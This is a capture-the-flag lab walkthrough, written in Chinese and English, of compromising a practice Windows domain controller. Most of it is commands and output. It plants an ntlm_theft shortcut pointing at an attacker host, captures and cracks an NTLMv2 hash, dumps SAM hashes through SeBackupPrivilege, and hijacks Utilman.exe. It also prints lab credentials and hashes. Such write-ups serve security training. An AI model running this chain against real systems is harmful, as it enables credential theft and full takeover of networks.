┌──(chw㉿CHW)-[~/Vault] └─$ smbclient -L //192.168.122.172/. -U "anonymous" Password for [WORKGROUP\anonymous]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share DocumentsShare Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.122.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` > DocumentsShare 可能是利用的點 ``` ┌──(chw㉿CHW)-[~/Vault] └─$ crackmapexec smb 192.168.122.172 -u 'guest' -p '' --rid-brute SMB 192.168.122.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False) SMB 192.168.122.172 445 DC [+] vault.offsec\guest: SMB 192.168.122.172 445 DC [+] Brute forcing RIDs SMB 192.168.122.172 445 DC 498: VAULT\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 192.168.122.172 445 DC 500: VAULT\Administrator (SidTypeUser) SMB 192.168.122.172 445 DC 501: VAULT\Guest (SidTypeUser) SMB 192.168.122.172 445 DC 502: VAULT\krbtgt (SidTypeUser) SMB 192.168.122.172 445 DC 512: VAULT\Domain Admins (SidTypeGroup) SMB 192.168.122.172 445 DC 513: VAULT\Domain Users (SidTypeGroup) SMB 192.168.122.172 445 DC 514: VAULT\Domain Guests (SidTypeGroup) SMB 192.168.122.172 445 DC 515: VAULT\Domain Computers (SidTypeGroup) SMB 192.168.122.172 445 DC 516: VAULT\Domain Controllers (SidTypeGroup) SMB 192.168.122.172 445 DC 517: VAULT\Cert Publishers (SidTypeAlias) SMB 192.168.122.172 445 DC 518: VAULT\Schema Admins (SidTypeGroup) SMB 192.168.122.172 445 DC 519: VAULT\Enterprise Admins (SidTypeGroup) SMB 192.168.122.172 445 DC 520: VAULT\Group Policy Creator Owners (SidTypeGroup) SMB 192.168.122.172 445 DC 521: VAULT\Read-only Domain Controllers (SidTypeGroup) SMB 192.168.122.172 445 DC 522: VAULT\Cloneable Domain Controllers (SidTypeGroup) SMB 192.168.122.172 445 DC 525: VAULT\Protected Users (SidTypeGroup) SMB 192.168.122.172 445 DC 526: VAULT\Key Admins (SidTypeGroup) SMB 192.168.122.172 445 DC 527: VAULT\Enterprise Key Admins (SidTypeGroup) SMB 192.168.122.172 445 DC 553: VAULT\RAS and IAS Servers (SidTypeAlias) SMB 192.168.122.172 445 DC 571: VAULT\Allowed RODC Password Replication Group (SidTypeAlias) SMB 192.168.122.172 445 DC 572: VAULT\Denied RODC Password Replication Group (SidTypeAlias) SMB 192.168.122.172 445 DC 1000: VAULT\DC$ (SidTypeUser) SMB 192.168.122.172 445 DC 1101: VAULT\DnsAdmins (SidTypeAlias) SMB 192.168.122.172 445 DC 1102: VAULT\DnsUpdateProxy (SidTypeGroup) SMB 192.168.122.172 445 DC 1103: VAULT\anirudh (SidTypeUser) ``` #### 1.3 RPC ``` ┌──(chw㉿CHW)-[~/Vault] └─$ rpcclient -U '' -N 192.168.122.172 Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED ┌──(chw㉿CHW)-[~/Vault] └─$ rpcclient -U "" 192.168.122.172 > enumdomusers Password for [WORKGROUP\]: rpcclient $> ls command not found: ls rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient $> getdompwinfo result was NT_STATUS_ACCESS_DENIED rpcclient $> lsaquery Domain Name: VAULT Domain Sid: S-1-5-21-537427935-490066102-1511301751 rpcclient $> ``` > ACCESS_DENIED #### 1.4 LDAP ``` ┌──(chw㉿CHW)-[~/Vault] └─$ ldapsearch -x -H ldap://192.168.122.172 -D '' -w '' -b "DC=vault,DC=offsec" # extended LDIF # # LDAPv3 # base <DC=vault,DC=offsec> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4563 # numResponses: 1 ``` ### 2. Ntlm-theft 利用 SMB Share folder 的 DocumentsShare #### 2.1 透過 Ntlm-theft 建立 link ``` ┌──(chw㉿CHW)-[~/Tools/ntlm_theft] └─$ python3 ntlm_theft.py -g lnk -s 192.168.45.178 -f vault Created: vault/vault.lnk (BROWSE TO FOLDER) Generation Complete. ┌──(chw㉿CHW)-[~/Tools/ntlm_theft] └─$ cp -r vault/ /home/chw/Vault ``` #### 2.2 開啟 responder 開啟 responder 監聽 VPN 網卡 ``` ┌──(chw㉿CHW)-[~/Vault/vault] └─$ sudo responder -I tun0 __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.5.0 To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] ``` #### 2.3 透過 SMB 將 link 上傳 ``` ┌──(chw㉿CHW)-[~/Vault/vault] └─$ smbclient -L //192.168.122.172/. -U "guest" Password for [WORKGROUP\guest]: smb: \> put vault.lnk putting file vault.lnk as \vault.lnk (6.7 kb/s) (average 6.7 kb/s) smb: \> ``` #### 2.4 成功收到 Hash responder 接收到 NTLMv2 Hash ``` [+] Listening for events... [SMB] NTLMv2-SSP Client : 192.168.122.172 [SMB] NTLMv2-SSP Username : VAULT\anirudh [SMB] NTLMv2-SSP Hash : anirudh::VAULT:c5f2198475822af2:D914BD118478AA6190A58EA9D3DD02AC:01010000000000000057457C5D9DDB01F6B20BD597FA84C90000000002000800500033005000330001001E00570049004E002D0034004F00440046005A004B004600300036005A004C0004003400570049004E002D0034004F00440046005A004B004600300036005A004C002E0050003300500033002E004C004F00430041004C000300140050003300500033002E004C004F00430041004C000500140050003300500033002E004C004F00430041004C00070008000057457C5D9DDB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100370038000000000000000000 ``` > 儲存成 `anirudh.hash` ### 3. John 爆破 ``` ┌──(chw㉿CHW)-[~/Vault] └─$ hashid 'anirudh::VAULT:c5f2198475822af2:D914BD118478AA6190A58EA9D3DD02AC:01010000000000000057457C5D9DDB01F6B20BD597FA84C90000000002000800500033005000330001001E00570049004E002D0034004F00440046005A004B004600300036005A004C0004003400570049004E002D0034004F00440046005A004B004600300036005A004C002E0050003300500033002E004C004F00430041004C000300140050003300500033002E004C004F00430041004C000500140050003300500033002E004C004F00430041004C00070008000057457C5D9DDB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100370038000000000000000000' -m Analyzing 'anirudh::VAULT:c5f2198475822af2:D914BD118478AA6190A58EA9D3DD02AC:01010000000000000057457C5D9DDB01F6B20BD597FA84C90000000002000800500033005000330001001E00570049004E002D0034004F00440046005A004B004600300036005A004C0004003400570049004E002D0034004F00440046005A004B004600300036005A004C002E0050003300500033002E004C004F00430041004C000300140050003300500033002E004C004F00430041004C000500140050003300500033002E004C004F00430041004C00070008000057457C5D9DDB01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100370038000000000000000000' [+] NetNTLMv2 [Hashcat Mode: 5600] ┌──(chw㉿CHW)-[~/Vault] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt anirudh.hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status SecureHM (anirudh) 1g 0:00:00:03 DONE (2025-03-25 08:19) 0.2923g/s 3103Kp/s 3103Kc/s 3103KC/s Seifer@14..Sarahmasri Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed. ``` > `anirudh`:`SecureHM` ### 4. Evil-WinRM ``` ┌──(chw㉿CHW)-[~/Vault] └─$ evil-winrm -i 192.168.122.172 -u anirudh -p SecureHM Evil-WinRM shell v3.5 ... Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\anirudh\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeSystemtimePrivilege Change the system time Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled ``` > SeBackupPrivilege > >成功登入 ### ✅ Get User Flag > 在 `C:\Users\anirudh\Desktop`找到 User flag 發現可以直接到 `C:\Users\Administrator\Desktop` ``` *Evil-WinRM* PS C:\Users\Administrator> cd Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/25/2025 4:10 AM 34 proof.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt Access to the path 'C:\Users\Administrator\Desktop\proof.txt' is denied. At line:1 char:1 + type proof.txt + ~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\proof.txt:String) [Get-Content], UnauthorizedAccessException + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand ``` > 但沒有權限開啟 ## Privileges Escalation ### 5. SeBackupPrivilege: Shadow Copy ``` *Evil-WinRM* PS C:\Users\anirudh\Desktop> reg save HKLM\SYSTEM system The operation completed successfully. *Evil-WinRM* PS C:\Users\anirudh\Desktop> reg save HKLM\SAM sam The operation completed successfully. *Evil-WinRM* PS C:\Users\anirudh\Desktop> ls Directory: C:\Users\anirudh\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/25/2025 6:03 AM 34 local.txt -a---- 3/25/2025 6:34 AM 49152 sam -a---- 3/25/2025 6:30 AM 16478208 system *Evil-WinRM* PS C:\Users\anirudh\Desktop> download system Info: Downloading C:\Users\anirudh\Desktop\system to system Info: Download successful! *Evil-WinRM* PS C:\Users\anirudh\Desktop> download sam Info: Downloading C:\Users\anirudh\Desktop\sam to sam Info: Download successful! ``` ### 6. 使用 secretsdump ``` ┌──(chw㉿CHW)-[~/Vault] └─$ impacket-secretsdump -system system -sam sam LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Cleaning up... ┌──(chw㉿CHW)-[~/Vault] └─$ evil-winrm -i 192.168.122.172 -u Administrator -H 608339ddc8f434ac21945e026887dc36 Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1 ``` > 爆破出來的 Hash 是 local user > 在 Domain Controller 上登入無效 ### 7. SeRestorePrivilege: Utilman.exe Hijack 如果我們重新啟動或登出機器並在登入畫面上按 Windows 鍵 + U，系統將以系統權限啟動 `Utilman.exe` 是 Windows login screen 上可以啟動的「輔助工具」 ``` *Evil-WinRM* PS C:\Users\anirudh\Desktop> mv C:/Windows/System32/Utilman.exe C:/Windows/System32/Utilman.old *Evil-WinRM* PS C:\Users\anirudh\Desktop> mv C:/Windows/System32/cmd.exe C:/Windows/System32/Utilman.exe ``` 啟動 RDP，點選輔助工具 ``` ┌──(chw㉿CHW)-[~/Vault] └─$ rdesktop 192.168.122.172 ```  ### ✅ Get Root FLAG